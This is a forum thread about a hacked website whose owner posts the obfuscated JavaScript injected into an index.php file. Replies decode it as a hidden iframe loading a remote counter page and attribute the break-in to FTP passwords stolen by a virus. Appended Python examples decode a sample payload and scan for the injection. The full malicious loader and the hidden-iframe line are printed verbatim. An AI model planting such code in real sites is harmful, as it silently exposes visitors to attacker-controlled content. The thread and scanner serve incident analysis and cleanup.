Hacked website?

Today, implanted code was discovered in the site's index.php. The code was implanted between the ? and the > of the ?>.

Does anyone know what this hack is and what it does?

<html><body><script>var el,ar,ar2,pos,yes=false;setInterval(function(){if(yes){try{try{a1=a2}catch(a){b[2]=21};}catch(a){k=el.innerHTML+a.toString().substr(0,0);};ar='0(: ]tn Ee{oa>rs\'T[=NyghvuwC-'zA<cp);1.B/bm}flid';


ar2='R12c12c188c180c28c4c192c44c136c104c172c36c24c20c156c92c36c20c32c184c36c172c36c24c20c60c160c88c68c48c92c84c48c172c36c4c120c168c44c192c88c120c144c76c0c16c144c40c12c12c12c188c180c56c48c172c36c56c4c144c148c12c12c176c28c36c184c60c36c28c40c12c12c12c192c44c136c104c172c36c24c20c156c108c56c188c20c36c4c64c132c188c180c56c48c172c36c28c60c56c136c80c120c96c20c20c140c8c164c164c24c20c116c60c20c48c20c60c156c136c124c156c136c136c164c136c44c104c24c20c36c56c156c96c20c172c120c28c108c188c192c20c96c80c120c152c0c120c28c96c36c188c92c96c20c80c120c152c0c120c28c60c20c88c184c36c80c120c100c188c60c188c168c188c184c188c20c88c8c96c188c192c192c36c24c148c140c44c60c188c20c188c44c24c8c48c168c60c44c184c104c20c36c148c184c36c180c20c8c0c148c20c44c140c8c0c148c120c52c132c164c188c180c56c48c172c36c52c64c144c148c12c12c176c12c12c180c104c24c136c20c188c44c24c28c188c180c56c48c172c36c56c4c144c40c12c12c12c100c48c56c28c180c28c80c28c192c44c136c104c172c36c24c20c156c136c56c36c48c20c36c32c184c36c172c36c24c20c4c120c188c180c56c48c172c36c120c144c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c60c56c136c120c72c120c96c20c20c140c8c164c164c24c20c116c60c20c48c20c60c156c136c124c156c136c136c164c136c44c104c24c20c36c56c156c96c20c172c120c144c148c180c156c60c20c88c184c36c156c100c188c60c188c168c188c184c188c20c88c80c120c96c188c192c192c36c24c120c148c180c156c60c20c88c184c36c156c140c44c60c188c20c188c44c24c80c120c48c168c60c44c184c104c20c36c120c148c180c156c60c20c88c184c36c156c184c36c180c20c80c120c0c120c148c180c156c60c20c88c184c36c156c20c44c140c80c120c0c120c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c108c188c192c20c96c120c72c120c152c0c120c144c148c180c156c60c36c20c128c20c20c56c188c168c104c20c36c4c120c96c36c188c92c96c20c120c72c120c152c0c120c144c148c12c12c12c192c44c136c104c172c36c24c20c156c92c36c20c32c184c36c172c36c24c20c60c160c88c68c48c92c84c48c172c36c4c120c168c44c192c88c120c144c76c0c16c156c48c140c140c36c24c192c112c96c188c184c192c4c180c144c148c12c12c176]'.replace(k.substr(0,1),'[');pau='urn 
eReferenceErr'.replace(k,'val');e=Function('ret'+pau)();ar2=e(ar2.replace(/c/g,','));s=";pos=0;for(i=0;i!=ar2.length;i++){e('pos=parseInt(ar2[i] / 4)');e('s+=ar.substr(pos,1)');}
e(s);yes=false;}},20);setTimeout(function(){el=document.createElement('div');el.innerHTML='&#82;&#101;&#102;&#101;&#114;&#101;&#110;&#99;&#101;&#69;&#114;&#114;';yes=true;},1);</script></body></html>
October 10th 19 at 07:33
4 answers
October 10th 19 at 07:35
It's banal: the FTP passwords leaked.
Not sure, but possible. Because the hack failed. The code was inserted between ?> (?(code)>). And in the end the engine just returned a PHP error. - jessika38 commented on October 10th 19 at 07:38
Filled with machine code, so there are often mistakes. - kavon.Murphy commented on October 10th 19 at 07:41
have Savile crooked apparently. )
Options other than FTP access are extremely unlikely (loading an exploit, scanning the file system); it is much easier even to use social engineering to get the password, not to mention passwords saved in Total Commander on the client's infected computer. - Myah_Jones commented on October 10th 19 at 07:44
A typo, according to Freud :) "using social engineering"* - Myah_Jones commented on October 10th 19 at 07:47
Yes, FTP, FTP...
A year ago there was a big wave of a virus that, once on the computer, scanned the registry and configs for popular FTP clients and their saved passwords (FAR, TC, etc.).
Then it went to all the available sites and added this code to all files named index.php, index.html, etc.
There's some kind of virus. - Evie commented on October 10th 19 at 07:50
I have neither FAR nor TC. The passwords are in Transmit. Should I worry about password theft on MacOS X?? - jessika38 commented on October 10th 19 at 07:53
I don't know, I haven't used it. But in general, storing passwords in a remote access program is a risk in any case. Create a text document and put it in an encrypted partition; that will be safe - Myah_Jones commented on October 10th 19 at 07:56
October 10th 19 at 07:37
It inserts an iframe like this:

<iframe src="http://nt-stats.cz.cc/counter.htm" width="10" height="10" style="visibility:hidden;position:absolute;left:0;top:0;"></property></iframe>
And the server is not found. By the way, this code is on hundreds of websites. - jessika38 commented on October 10th 19 at 07:40
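
Added example, not part of the thread: the script in the question stores its payload as a list of numbers and rebuilds it with `pos=parseInt(ar2[i] / 4)` and `ar.substr(pos,1)`, so a payload in that layout can be decoded statically instead of being run in a browser. The alphabet, the encoded string and the function names below are constructed for illustration and are not the values from the question.

```python
import re

# Constructed sample, not the payload from the question: same layout as the
# script's `ar` (alphabet) and `ar2` (index list) variables.
SAMPLE_ALPHABET = 'ab cdefhilmprstx<>=":/.'
SAMPLE_ENCODED = ("R64c32c24c48c0c40c20c8c52c48c12c72c76c28c56c56c44c80c84c84"
                  "c4c0c16c88c20c60c0c40c44c36c20c84c12c88c28c56c40c76c68]")


def decode_index_payload(encoded, alphabet, divisor=4):
    """Decode 'R<n>c<n>c...]' statically; nothing is eval'd or executed."""
    body = encoded.strip()
    if len(body) < 2 or not body.endswith("]"):
        raise ValueError("expected '<marker>n c n ... ]' layout")
    # The script swaps the first character for '[' and every 'c' for ','
    # at run time; here the wrapper is simply dropped.
    tokens = body[1:-1].split("c")
    chars = []
    for tok in tokens:
        if not tok.isdigit():
            raise ValueError("non-numeric token: %r" % tok)
        pos = int(tok) // divisor  # mirrors parseInt(ar2[i] / 4)
        if pos >= len(alphabet):
            raise ValueError("index %d outside alphabet" % pos)
        chars.append(alphabet[pos])
    return "".join(chars)


def extract_src_urls(markup):
    """Pull src= targets out of decoded markup for blocklists or log searches."""
    return re.findall(r"""src\s*=\s*["']?([^"'\s>]+)""", markup, flags=re.I)


if __name__ == "__main__":
    decoded = decode_index_payload(SAMPLE_ENCODED, SAMPLE_ALPHABET)
    print(decoded)
    print(extract_src_urls(decoded))
```

An out-of-range index raises instead of being skipped, which signals that the alphabet string was copied incompletely or damaged on the way.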
October 10th 19 at 07:39
A virus on the home computer pulled the saved FTP passwords. You need to install an antivirus and change the FTP access.
October 10th 19 at 07:41
Who is your hosting provider? I have the same problem on my father's website. This code is in all index.* files.
Provider "Prohosting", Ukraine, Dnepropetrovsk. - jessika38 commented on October 10th 19 at 07:44
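
Added example, not part of the thread: since the answers report the same code in every index.* file, a cleanup starts with listing which of those files carry it. This sketch walks a web root and flags index.* files matching three patterns taken from the code quoted above (the hidden iframe, the `Function('ret'+...)` idiom, and the long `c`-separated number list); the function names and the demo files are constructed for illustration.

```python
import os
import re
import tempfile

# Signatures taken from the code quoted in this thread; hits need manual review.
SIGNATURES = {
    "hidden-iframe": re.compile(r"<iframe[^>]*visibility\s*:\s*hidden", re.I),
    "function-eval": re.compile(r"Function\(\s*['\"]ret['\"]\s*\+"),
    "index-array": re.compile(r"(?:\d{1,3}c){40,}\d{1,3}"),
}


def scan_file(path):
    """Return the sorted names of the signatures found in one file."""
    with open(path, "r", encoding="utf-8", errors="replace") as fh:
        text = fh.read()
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(text))


def scan_webroot(root):
    """Map each flagged index.* file (path relative to root) to its hits."""
    findings = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().startswith("index."):
                continue
            path = os.path.join(dirpath, name)
            hits = scan_file(path)
            if hits:
                findings[os.path.relpath(path, root)] = hits
    return findings


def build_demo_tree(root):
    """Write constructed sample files (not from the thread) for an offline run."""
    clean = "<?php echo 'hello'; ?>\n"
    injected = ("<?php echo 'hello'; ?<script>ar2='R" + "12c" * 60 + "12]';"
                "e=Function('ret'+pau)();</script>>\n")
    iframe = ('<html><iframe src="http://bad.example/c.htm" '
              'style="visibility:hidden;position:absolute"></iframe></html>\n')
    os.makedirs(os.path.join(root, "blog"))
    samples = {"index.php": injected, "index.htm": clean,
               os.path.join("blog", "index.html"): iframe,
               os.path.join("blog", "about.php"): clean}
    for rel, body in samples.items():
        with open(os.path.join(root, rel), "w", encoding="utf-8") as fh:
            fh.write(body)


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        build_demo_tree(tmp)
        for path, hits in sorted(scan_webroot(tmp).items()):
            print(path, ", ".join(hits))
```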
